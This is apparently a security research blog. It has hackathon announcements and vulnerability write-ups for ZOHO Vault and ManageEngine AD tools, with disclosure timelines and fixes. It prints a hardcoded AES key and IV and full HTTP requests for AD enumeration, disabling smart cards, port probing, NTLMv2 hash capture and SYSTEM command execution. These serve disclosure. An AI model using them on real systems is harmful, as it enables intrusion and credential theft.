Wednesday, September 26, 2018

3rd 0DAYALLDAY RESEARCH EVENT

Hacking, Drinking, & Hacking...

When: September 29th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

  • There are several great places nearby to grab food.
  • There will be some free booze (vodka, whiskey, beer) If you want you can bring some more.

Rules:

  • Must participate. Researching for others counts
  • If you find a vulnerability it's yours. (Unless otherwise noted. Vulnerabilities that involve health or known to be sue happy it will be required to do full disclosure to protect all involved.)
  • If there is a bug bounty you get to choose what to do with the money. Sponsor next event or keep it. Maybe a little of both.
  • Smoking analog or vape please step outside.
  • Don't be a dick.

Prize's:

  • Most found CVE's - $50 Gift Card to Amazon
  • Best vulnerability found - $25 Gift Card to Amazon
  • Community MVP - $25 Gift Card to Amazon
  • Miss Congeniality - Hugs and Free 0DayAllDay T-Shirt

Hacking:

This quarters theme is Hardware Hacking.

  • Arris Surfboard - Model SB6141 (Forced full disclosure)
  • Netgear - CM500-100NAS Cable Modem (Forced full disclosure)
  • AT&T Router/Gateway - Model 5268ac
  • Guardzilla - All-In-One Video Security System
  • D-Link N300 WiFi Router - Model DIR-605L H/W Ver.: B3, F/W Ver.: 2.09UI
  • TP-Link 300 Wireless N Router - Model TL-WR841N
  • TP-Link 150 Wireless N Router - Model TL-WR741ND
  • Carl and Stuart Flexi Cam
  • Space Invaders
  • WYZE Cam - Model WYZECP1
  • Couple surprise targets as well.
  • If you have something you want to hack on feel free to bring it. (Please note you will have to relieve us of any damage that might happen, aka we will most likely break it.)

Details of targets

Listed here is any work done by others and can be used as reference or to jump start our work.

  • Car and Stuart Flexi Cam Blog
  • AT&T Router/Gateway Blog
  • AT&T Router/Gateway Slides
  • Guardzilla Not really vulnerabilities but interesting info that should be validated Post
  • TP-Link 300 TL-WR841N We have already done some work on this one and found some easy wins.
  • All targets should be Googled before hand just to double check if there is any pre-existing work.

Getting started

  • Slides INIT_6 did for PWN School. Brief overview Slides

Tools & Equipment

  • Laptop is required
  • If you have a Bus Pirate, Shikra, OSEPP FTDI, JTagulator, or any UART or JTAG equipment you should bring it. We will have enough equipment for teams of 3 or 4 people. That being said more is always better.
  • We will have 2 soldering irons, Header pins, jumper wires, etc However, if you have some feel free to bring it.

Software

  • Kali Linux (Already has most of the tools needed, You can use Windows but Linux will be better)
  • Binwalk GitHub Make sure you follow the this install guide and do all the dependencies. GitHub Wiki
  • OpenOCD for JTag Site

Tuesday, July 17, 2018

ZOHO - A Story Of Where Not To Store Keys

The second 0DayAllDay event was June 9th, 2018 from 10am to 9pm. It was organized by Spectant Security and Blackmarble.sh. More information on 0DayAllDay can be found here

Last 0DayAllDay event was focused around Password Managers, Thycotic, Keeper, ZOHO Vault were a some of the targets. Only bug that was found was for ZOHO Vault.

ZOHO Vault is an online password manager focused on businesses. Included in their software is a AD/LDAP provisioning application. The application ask some standard question like your master ZOHO Account Username and Password, Domain Administrator (What isn't really needed) Username and Password, connection details. After you fill this out, Application connects to the Domain Controller and you select the users you want to import into ZOHO Vault.

The AD/LDAP provisioning application stores the AES encryption key and IV in the source code. Obtaining these strings is trivial. You can use JetBrains.dotPeek for example to decompile the executable.

Once decompiled, you can see that Provisioning_Utils namespace has a CryptUtil class that uses a static string for both the Key and IV.

namespace Provisioning_Utils { public class CryptUtil { private static UTF8Encoding encoding = new UTF8Encoding(); private static byte[] kBytes = CryptUtil.encoding.GetBytes("6ZUJiqpBKHuNuS@*"); private static byte[] tmpIV = CryptUtil.encoding.GetBytes("BJLTHGVTPJQMDEXO");

The vault.zoho.com account password and the Windows Administrator account password are stored in the provisioning.conf file as encrypted text. The Provisioning application can be ran on any computer on the domain. Access to this provisioning.conf file is not guaranteed to be protected. It some cases it would be fairly easy for unauthorized access to the provisioning.conf file.

I have successfully wrote a new standalone program that takes the encrypted text as an argument and decrypts the password showing the plain text password.

First, C# program I have made. It was pretty easy, just needed to copy and paste the decompiled code. Googled a few things, and surprisingly got it to build on the second try.

For full source code and binary check out my GitHub

You do need some other access to exploit this; however, for pentesters if they find this provisioning.conf file game over. Gain access to all the passwords saved on ZOHO Vault (Edit: You need a secondary password to decrypt the Vault) and have Domain Admin. It was reckless to have the keys to your kingdom so easily available.

ZOHO issued me their own CVE number: ZVE-2018-0976

Disclosure Timeline:
Found Vulnerability: June 8th, 2018
Disclosed to ZOHO: June 10th, 2018
ZOHO Closed: July 12th, 2018

Reward: Nothing :( 10 stupid points. I can't buy beer with points.

EDIT:

ZOHO Updates Ticket: July 13th, 2018

Reward: $100 and 10pts. We have beer money for the next event now.

After making a post I like to watch Google Analytics for my blog just to see the kind of response I get. Got a couple referrals from supportlab.zoho.com and docs.zoho.com less than a hour from posting on twitter. I think they have a twitter bot looking for their name. Anyways, they updated the ticket I had open with them.

response

It is true, I had an error. Even though you have the ZOHO Vault login password, you need a secondary encryption password to get access to the content (View Passwords).

They fixed the vulnerability by removing the unneeded ZOHO account password and using dynamic unique keys to encrypt scoped authentication token and AD Password for every installation.

Finial notes:

What this tells me is the Authentication token doesn't expire I thought this was true as I played around with it as well. Which was clear text before in the provisioning.conf. Now I am interested in the new way they are doing the keys. I'll have to take another look when I get some time.

Friday, June 8, 2018

2nd 0DAYALLDAY RESEARCH EVENT

2nd 0DAYALLDAY RESEARCH EVENT

Hacking, Drinking, & Hacking...

When: June 9th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

  • There are several great places nearby to grab food.
  • There will be some free booze (vodka, whiskey, beer) If you want you can bring some more.

Rules:

  • Must participate. Researching for others counts
  • If you find a vulnerability it's yours.
  • If there is a bug bounty you get to choose what to do with the money. Sponsor next event or keep it. Maybe a little of both.
  • Smoking analog or vape please step outside.
  • Targets are on 192.168.66.0/24 network stay there :)
  • Don't be a dick.

Prize's:

  • Most found CVE's - $50 Gift Card to Amazon
  • Best vulnerability found - $25 Gift Card to Amazon
  • Community MVP - $25 Gift Card to Amazon
  • Miss Congeniality - Hugs and Free 0DayAllDay t-shirt

Hacking:

This quarters theme is Password Managers and their associated Android applications.

Details of targets

  • Domain Server and General Info

    • HOST
      • Domain Controller Windows Server 2016
      • IP: 192.168.66.100
      • Domain: blackmarble.sh
      • Admin: administrator
      • Pass: ][Password][
      • Other users:
        • fox.zero
        • fox.one
        • ...
        • fox.ten
      • Global Read-Only Share: //WIN-7LPVLIICTR2/Data
        • cacert.pem This file is for importing into Burp for Android.
        • apks folder has all the .apk install files along with the decompiled source code.
        • Keeper folder has the install files for keeper along with it's agents.
        • ManageEngine PMP folder has the Windows agent and the installer.
        • gray folder has a .net decompiler program and injector
        • Thycotic has the agents and installer.
      • Global Read/Write Share: //WIN-7LPVLIICTR2/Share
        • Feel free to put whatever here.
    • Software
  • Android

    • HOST

    • Software

      • Keeper
      • Thycotic Secret Server
      • Thycotic PAM
      • Password Manager - Zoho Vault
      • PMP (Couldn't get to work)
      • LastPass
      • Norton IDSafe
      • Google Play store works, If you want to attack something else thats okay.
    • Burp Configuration

      • Import the cacert.pem into your Burp. (Make sure you regenerate after you leave)
      • In the Android VM, Hit ALT+F1 to access terminal.
      • su to root
      • Configure iptables to redirect traffic to your Burp.
      • iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
      • iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
      • Restart the VM if you want to flush out existing iptable rules.
      • If you want to use your own cert check out my blog entry here
    • ADB Configuration

      • Android Documentation can be found here
      • In the Android VM, Hit ALT+F1 to access terminal.
      • Get the IP Address: ifconfig
      • adb connect ip_address

Wednesday, May 2, 2018

First 0DAY ALL DAY Event Findings

The first 0DAYALLDAY event was held on April 7th, 2018 from 11am to Midnight.  It was organized by Spectant Security and the Blackmarble group (blackmarble.sh):

https://spectant.io
https://blackmarble.sh/0-day-all-day/

0DAYALLDAY is a quarterly REAL "Hack-A-Thon" where security researchers from the DFW Metroplex come together to hunt for bugs in supplied software.

The first event was invitation only to work out the kinks and observe the feasibility and logistics of future events. You can find more information directly at the 0DAYALLDAY website: https://www.0dayallday.org/

The main software Spectant targeted was the Manage Engine AD Self Service Plus installation and the Manage Engine AD Manager Plus installation. The following table lists the issues found along with their risk scores:

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium
ADSelfService Plus Authenticated Host and Port Enumeration Medium
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

The following section describes the technical details for each finding.

Detailed Findings

Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High

The default installation of Manage Engine's ADSelf Service Plus application allows anyone to search for employees or view an organizational chart.  By sending the following unauthenticated request an attacker can enumerate the entire domain:


GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/authorization.do
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


This chart on the surface shows various information about the user and the domain that user is associated with:

However, by viewing the returned HTML source code for the OrganizationChart.cc request much more detailed information is available about the underlying AD structure:


<div style="padding:3px 5px;" id="CN=Administrator,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=Guest,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=DefaultAccount,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...


Not only can a potential attacker obtain usernames, emails, phone numbers, and potential user photos of victims, they can also obtain what AD Domains they are apart of as well as what OU's they are in. Since the Organzation Chart displays a list of ALL users within the AD it is also possible for a potential attacker to determine what software is installed across the organization by observing which user system and service accounts are present. All of this can be combined to build and execute a very convicing social engineering attack.

Recommendation:

As a work around it is recommended that "Employee Search" be disabled from the Configuration options with ADSelfService Plus. However, Manage Engine should really but this search feature behind the authentication portal in the default install.

ANY User Can remove and enable/disable smart cards for other users

Software Finding Risk Rating
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High

While doing cross account access testing it was discovered that the /WC/SmartCard.do application endpoint allowed even the lowest privileged user the ability to enable and disable any smart card configured in the system by directly interfacing with the endpoint. This is done by sending the following request:


POST /WC/SmartCard.do?mTCall=enableDisableSmartCard HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 79
Cookie: JSESSIONIDADSSP=00B684925C94F202DBF9139805493DD5; JSESSIONID=08C2A68C1BBF9E4E46ABE59844D3BBA3; NTLM_LOGGED_OUT=true; adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0; JSESSIONIDSSO=EBF4FB52BC685DC4A2FF9639FAF75D83
DNT: 1
Connection: close

IS_ENABLED=false&SMARTCARD_ID=1&URL=&adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0


The request above will cause the application to either enable or disable the smart card referenced with the SMARTCARD_ID parameter:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 132
Date: Wed, 11 Apr 2018 11:21:52 GMT
Connection: close

{"sSTATUS":"ads.admin.logon_settings.smartcard_settings.enable_disable_success","SMARTCARD_NEEDS_RESTART":false,"IS_ENABLED":false}


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to enable or disable smart card authentication requirements.

Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium

During testing it was also noted that even if the "Employee Search" option and OrganizationChart.cc endpoint were disabled it was still possible for the lowest privilege users to access full User, Group, Domain, and Computer/System lists from the /ADSPopupAction.do application endpoint.

This endpoint contains a method called getDataModelUIDesign that expects a JSON parameter string in a POST request. Within the JSON parameter you can specify an objectTypeId to enumerate the Users, Groups, Domains, and Computer/Systems. This is evident by sending the following request with objectTypeId: 2


POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/RestrictUsers.do?methodToCall=generate&action=staleAccountPage&init=true&selectedTab=admin&selectedTile=RestrictUsersSettings&domains=DC=blackmarble,DC=sh&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 261
Cookie: JSESSIONIDADSSP=CF41E5FBF4EE234934E3C64D4211352E; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=C77D3B15E0F4DB4A094B7303DF810027; adscsrf=969db194-807f-48d8-b8ff-63668b69b927;
DNT: 1
Connection: close

params={"popupId":5,"objectTypeId":2,"viewModelId":11,"domainName":"blackmarble.sh","allDomains":false,"isForestDomainsOnly":false,"colFilter":{},"popupDataModelId":11,"searchText":"","start":1,"end":100,"range":100}&adscsrf=969db194-807f-48d8-b8ff-63668b69b927


The above request will return a list of Users and their corresponding domain:



By changing the objectTypeId to 4 in the following request it is possible to see a full list of systems associated with the AD Domain including which systems are the designated Domain Controllers:


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access any potentially sensitive objectTypeIds.

Authenticated Host and Port Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated Host and Port Enumeration Medium

One of the more interesting endpoints discovered during testing was the /JumpToAction.do application endpoint. This endpoint contains a method called testConnection that expects a parameter called URL. If you supply a IP/URL and PORT combination the application attempts to connect to the supplied URL and PORT and returns success or failure depending on status of the connection:


POST /JumpToAction.do?mTCall=testConnection HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 73
Cookie: JSESSIONIDADSSP=2C1D14504E2E15CB00C7BD5F14D6BE17; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; adscsrf=7094a261-8a15-4492-ac0c-75b35a539700; JSESSIONIDSSO=8057D2014941CAC8031120C1E346B3C1
DNT: 1
Connection: close

URL=http://[REDACTED]:22/&adscsrf=7094a261-8a15-4492-ac0c-75b35a539700


The connection above will cause the system to check if PORT 22 is open on HOST [REDACTED]. Since this port is open it will return "success":


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 9
Date: Wed, 11 Apr 2018 12:24:07 GMT
Connection: close

success


Combining this with the ADSPOPUP vulnerability allows the attacker to potentially finger print the entire network based on open ports and software installed.

Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access the testConnection method of the JumpToAction.do application endpoint.

Admin DBBackup Remote Host Enumeration and SMB Capture

Software Finding Risk Rating
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational

While testing the application it was noted that the admin account for the ADSelfService Plus application could execute database backups. This account could specify the local system path used for storing the database backups. The application does not validate that the path supplied by the admin is a valid local system path and will attempt to access any path supplied.

Using this knowledge, it is possible for an attacker with admin privileges to supply a remote UNC path for the database backup to be stored. This causes the system to attempt to authenticate with the remote, attacker supplied, system. During this attempted authentication the NTLMv2 has can be retrieved:


[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\MANAGEENGINE-01$
[SMB] NTLMv2-SSP Hash : MANAGEENGINE-01$::BLACKMARBLE:1122334455667788:57AB85[...SNIP...]380032002E8000000000000000000
[SMB] Requested Share : \\[REDACTED]\IPC$

[SMB] Requested Share : \\[REDACTED]\TEST2
[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::BLACKMARBLE:1122334455667788:D7446276CF[...SNIP...]3100330038000000000000000000


Recommendation:

It is recommended that the application verify that the administrator is only supplying local system paths.

Application Admin can Run Commands as SYSTEM via User Modification Scripts

Software Finding Risk Rating
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

It was noted during testing that there is a section of the user modification where the admin can supply a custom script that executes immediately. By sending the following requset:


POST /ExecuteForm.do?methodToCall=submitExecuteLayout&templateCategoryId=6&isWorkFlowMode=false HTTP/1.1
Host: 127.0.0.1:7778
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7778/ExecuteForm.do?methodToCall=init&operation=singleModify&templateCategoryId=6&guid={E034A7E7-0ED8-4761-82A0-C92E3304F943}&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 146672
Cookie: JSESSIONIDADSSP=973B256F550EEAF12D8858EC8C3D1601; JSESSIONID=70D75AB6A980017519AE98671F18838A; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=DC158F7DF0B24F4DC0A4884CAD8C74CD; adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1; CUSTOM_SSO_TICKET=1523459129211; CUSTOM_SSO_APP_NAME="ManageEngine ADManager Plus"; CUSTOM_SSO_APP_TAG_NAME=ADMP; APPS_PANE_LOADED=true
DNT: 1
Connection: close

FcExecuteLayout= ...[SNIP]...
{"tabId":"32","tabName":"Custom%20Attributes","layoutId":"8","tabSeq":"7","isO365Tab":"false","description":"description","isHidden":"false","FcRhsLayoutSubTabGroup":[{"tabId":"32","subTabGroupId":"32","subTabGroupName":"Custom%20Attributes","isOptionTab":"false","isCustomTab":"true","optionTabType":"","FcRhsLayoutSubTab":[{"subTabId":"37","subTabGroupId":"32","subTabName":"Custom%20Attributes","subTabType":"","isDefaultSelectedSubTab":"false","isHidden":"true","lhsSubTabId":"18","fieldGroupsStatusMsg":"No%20Field%20Groups%20are%20available.","FcRhsLayoutFieldGroup":[{"fieldGroupId":"55","subTabId":"37","fieldGroupName":"Custom%20Attributes","description":"Description","fieldGroupSeq":"1","isSingleColumn":"false","isHidden":"false","FcRhsLayoutField":[{"ComponentVals":{"scriptEnabled":true,"scriptCommand":"whoami","ignoreWarning":true},"AvoidDuplicationDetails":{"duplicationLevel":"","isApplyNamingFormat":"false","stopExecution":"false","isAppendingNumber":"true","isAppendCharsSpecified":"false","appendStartIndex":"2","suffixLength":"2","fillingChars":"0","formatId":"-1"},"layoutFieldId":"245","fieldGroupId":"55","fieldId":"2616","componentId":"57","attribSeq":"1","isHidden":"false","position":"RHS","attribDisplayText":"Custom%20Script","defaultValue":"","isMandatory":"false","isReadOnly":"false","isEnabledForBulkEdit":"false","isAvoidDuplication":"false","isImmdeiateDuplicationCheck":"false","isCustomField":"false","minLen":"2","maxLen":"255","systemRestrictedLength":"255","helpText":"","isDomainSpecificField":"false","domainSpecificDataProviderClassName":"","validationIds":"","isAvailableInTemplate":"true","isRestricted":"false","isAuthorized":"true","isComponentLevelAuthorized":"false","iamAppId":"1","parentFieldId":"0","childFieldArr":[]}]}]}]}]}]}&templateId=8&isCopiedObject=false&isDirectCopyObject=false&isOverWriteADValue=true&adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1


This request (redacted for length) causes the application to immediately execute the "whoami" command and respond with the output of that command:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
expires: 1970-01-01 05:30:00
pragma: no-cache
cache-control: no-cache, no-store
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Date: Wed, 11 Apr 2018 15:07:25 GMT
Connection: close
Content-Length: 197494


...[SNIP]...

</table></td> <td width="10%" valign="top" align="right"><a class="linkblacktxt" href="javascript:hideStatusTable();"><img src="images/delete.gif" width="9" height="9" border="0"> Close</a><td></tr> <tr><td colspan="2" align="center"><span align="center" class="blacktxt">Custom script result: nt authority\system </span></span></td></tr></table></td> <td background="images/blue/gray_right_bgline.gif"><img src="images/blue/gray_right_bgline.gif" width="6" height="1"></td></tr><tr><td width="6" height="6" valign="top"><img src="images/blue/gray_botleft_curve.gif" width="6" height="6"></td> <td height="6" background="images/blue/gray_bot_bgline.gif"><img src="images/blue/gray_bot_bgline.gif" width="1" height="6"></td> <td width="6" height="6" valign="top"><img src="images/blue/gray_botright_curve.gif" width="6" height="6"></td></tr></table></td></tr></table><br></div>

Recommendation:

Since this is purely an informational finding and only noted to help anyone who may stumble upon an admin account for this application during a penetration test, there is no real recommendation. However, it should be noted that there should be the ability to disable this functionality and/or use a different system level account during installation to prevent potential system compromise.